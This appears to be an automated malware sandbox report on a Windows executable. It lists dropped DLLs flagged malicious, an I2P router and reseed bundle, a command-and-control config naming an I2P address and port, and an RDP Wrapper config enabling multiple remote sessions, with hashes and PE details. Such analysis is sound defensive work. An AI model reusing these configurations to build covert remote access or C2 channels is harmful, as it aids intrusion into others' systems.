                                                                                                                                                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

                                                                                                                                                C:\Windows\Temp\OwuZZod2

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.25860377459178
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                                                                                                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                                                                                                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                                                                                                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                                                                                                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\XpOp833v

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9146880
                                                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\YW6w5rMD

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8568
                                                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

                                                                                                                                                C:\Windows\Temp\YXkdIYk6

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):91136
                                                                                                                                                Entropy (8bit):6.2041507656664825
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                                                                                                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                                                                                                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                                                                                                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                                                                                                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\YkhL6reh

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92672
                                                                                                                                                Entropy (8bit):6.229119632298774
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                                                                                                                                                MD5:7FEA520E80E7A73252F2A5C204BBF820
                                                                                                                                                SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                                                                                                                                                SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                                                                                                                                                SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\ectg9CqJ

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):213
                                                                                                                                                Entropy (8bit):5.129024990254676
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                                                                                                                                                MD5:7D88563AD41BAF4026CFC5D098CBF40D
                                                                                                                                                SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                                                                                                                                                SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                                                                                                                                                SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

                                                                                                                                                C:\Windows\Temp\mf7RAl9N

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456534
                                                                                                                                                Entropy (8bit):5.450314708570292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                                                                                                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                                                                                                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                                                                                                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                                                                                                                                                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                                                                                                                                                C:\Windows\Temp\o6oDuAJl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):104448
                                                                                                                                                Entropy (8bit):6.236071662185895
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                                                                                                                                                MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                                                                                                                                                SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                                                                                                                                                SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                                                                                                                                                SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Windows\Temp\sdjnUb5S

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9:9
                                                                                                                                                MD5:006F29D8E822B9241020AEC2495EF819
                                                                                                                                                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                                                                                                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                                                                                                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:wgNj

                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1835008
                                                                                                                                                Entropy (8bit):4.421587708065162
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:gSvfpi6ceLP/9skLmb0OTkWSPHaJG8nAgeMZMMhA2fX4WABlEnNl0uhiTw:LvloTkW+EZMM6DFy703w
                                                                                                                                                MD5:0CDD0EA720BA42B582F3FEE4EAA69CF0
                                                                                                                                                SHA1:ADD3142A279ED91C6963F125CC36AE5DC1CF1841
                                                                                                                                                SHA-256:E11E78F2AEE8741B86927A85F166F60577B947082B7C2667C76330A30F6ACFED
                                                                                                                                                SHA-512:CF82C8CAFE0C53AA7F73BE66E9306C13B72F9F44DCDD99513207583A1E341872651099E2A032431FD0F9A3F11D08A3B2461974685B11D4F27C64EF7E0BDCE307
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb.P._..............................................................................................................................................................................................................................................................................................................................................U~G.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Entropy (8bit):6.058145218584745
                                                                                                                                                TrID:
                                                                                                                                                • Win64 Executable GUI (202006/5) 92.64%
                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                • VXD Driver (31/22) 0.01%
                                                                                                                                                File name:cZO.exe
                                                                                                                                                File size:4'528'128 bytes
                                                                                                                                                MD5:be6e88537235ff3b6b61de70dfeecb3b
                                                                                                                                                SHA1:4a622aa9cbbb7f66484734b85a211f20e0cb0edd
                                                                                                                                                SHA256:bc1a44614123c841e31835919a21ed7322ea6537f6652f36d24fd7f83a440294
                                                                                                                                                SHA512:5e17c7a71828a17e662e34e87aee6ed1b4c5472f7d301d552b408ead7818f81fa6075626753f23ef1360cb0a61e8955ab31c120d81225a13906ced46253f5838
                                                                                                                                                SSDEEP:49152:eu4bU2JKwANXmSqoZ5N/cHgxSSQgsIifDGnjazY72RRCRX:hZwOYg0CRX
                                                                                                                                                TLSH:09263B3B726981ABC25DC53FC463CF30E933757E1B33C6E7529102688A569C59E3EA24
                                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:6ab06e9aaaba8e50

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x756c70
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x6776E9FD [Thu Jan 2 19:33:17 2025 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:2
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:2
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                Import Hash:c8a018b209e2afcd868eeb52f0439e7f

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                dec eax
                                                                                                                                                sub esp, 20h
                                                                                                                                                dec eax
                                                                                                                                                mov ebp, esp
                                                                                                                                                nop
                                                                                                                                                dec eax
                                                                                                                                                lea ecx, dword ptr [FFFF0768h]
                                                                                                                                                call 00007F41CC3AEDB0h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC54h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                call 00007F41CC63FB41h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC45h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                mov dl, 01h
                                                                                                                                                call 00007F41CC6427F0h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC34h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                dec eax
                                                                                                                                                mov edx, dword ptr [FFFF00BAh]
                                                                                                                                                dec esp
                                                                                                                                                mov eax, dword ptr [0004C0B3h]
                                                                                                                                                call 00007F41CC63FB43h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC17h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                call 00007F41CC63FD54h
                                                                                                                                                call 00007F41CC3A6D2Fh
                                                                                                                                                jmp 00007F41CC6EF85Ah
                                                                                                                                                nop
                                                                                                                                                nop
                                                                                                                                                call 00007F41CC3A6F26h
                                                                                                                                                nop
                                                                                                                                                dec eax
                                                                                                                                                lea esp, dword ptr [ebp+20h]
                                                                                                                                                pop ebp
                                                                                                                                                ret
                                                                                                                                                dec eax
                                                                                                                                                nop
                                                                                                                                                dec eax
                                                                                                                                                lea eax, dword ptr [00000000h+eax]
                                                                                                                                                dec eax
                                                                                                                                                sub esp, 28h
                                                                                                                                                call 00007F41CC3A64BCh
                                                                                                                                                dec eax
                                                                                                                                                add esp, 28h
                                                                                                                                                ret
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3b40000x9b.edata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3ae0000x4736.idata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4120000x4f200.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3e30000x2ee48.pdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3b70000x2b854.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x3b60000x28.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x3af2600x10d0.idata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3b30000xdfc.didata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x355d000x355e00feaead5986e94891814e1ff29aa912d8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x3570000x4bfe00x4c00058062ea28fd240adb3c58f126d326b08False0.23840010793585525data4.710133660344198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .bss0x3a30000xa99c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .idata0x3ae0000x47360x48001854ba5d3306b139579f7a8ff3cbd757False0.24424913194444445data4.374645528668736IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .didata0x3b30000xdfc0xe003d6eff5550ae14066e23e41a1b4adadfFalse0.26841517857142855data3.3090454102610942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .edata0x3b40000x9b0x200f7c5bb68ad7d2f4a701d7e114bf654f1False0.259765625data1.917080347799001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .tls0x3b50000x1e40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rdata0x3b60000x6d0x200c6496e53b0addf155e9246f44da4560bFalse0.1953125data1.3902637598484393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x3b70000x2b8540x2ba003afb68c05ec358d7c6285f9a8b0a5197False0.46446879477077363data6.444856231549929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                .pdata0x3e30000x2ee480x2f000e24cc87fa0a02cee74658847ac8ccdadFalse0.49283161569148937data6.319372177464017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x4120000x4f2000x4f20015b10ae9b439df88df3be65b39ee9c6cFalse0.6019111621248026data6.703548983868326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_CURSOR0x412b580x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                RT_CURSOR0x412c8c0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                RT_CURSOR0x412dc00x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                RT_CURSOR0x412ef40x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                RT_CURSOR0x4130280x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                RT_CURSOR0x41315c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                RT_CURSOR0x4132900x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                RT_ICON0x4133c40x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 00.20460607304062373
                                                                                                                                                RT_ICON0x417fec0x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4031791907514451
                                                                                                                                                RT_ICON0x4185540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6814079422382672
                                                                                                                                                RT_ICON0x418dfc0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.517590618336887
                                                                                                                                                RT_ICON0x419ca40x5c70PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9795892494929006
                                                                                                                                                RT_STRING0x41f9140x428data0.3693609022556391
                                                                                                                                                RT_STRING0x41fd3c0x3f0data0.40773809523809523
                                                                                                                                                RT_STRING0x42012c0x3d4data0.42448979591836733
                                                                                                                                                RT_STRING0x4205000x410data0.39903846153846156
                                                                                                                                                RT_STRING0x4209100x444data0.40934065934065933
                                                                                                                                                RT_STRING0x420d540x340data0.41947115384615385
                                                                                                                                                RT_STRING0x4210940x39cdata0.34523809523809523
                                                                                                                                                RT_STRING0x4214300x264data0.5016339869281046
                                                                                                                                                RT_STRING0x4216940x47cdata0.3902439024390244
                                                                                                                                                RT_STRING0x421b100x364data0.33410138248847926
                                                                                                                                                RT_STRING0x421e740x414data0.40804597701149425
                                                                                                                                                RT_STRING0x4222880x10cdata0.6231343283582089
                                                                                                                                                RT_STRING0x4223940xccdata0.6764705882352942
                                                                                                                                                RT_STRING0x4224600x29cdata0.468562874251497
                                                                                                                                                RT_STRING0x4226fc0x3d0data0.3698770491803279
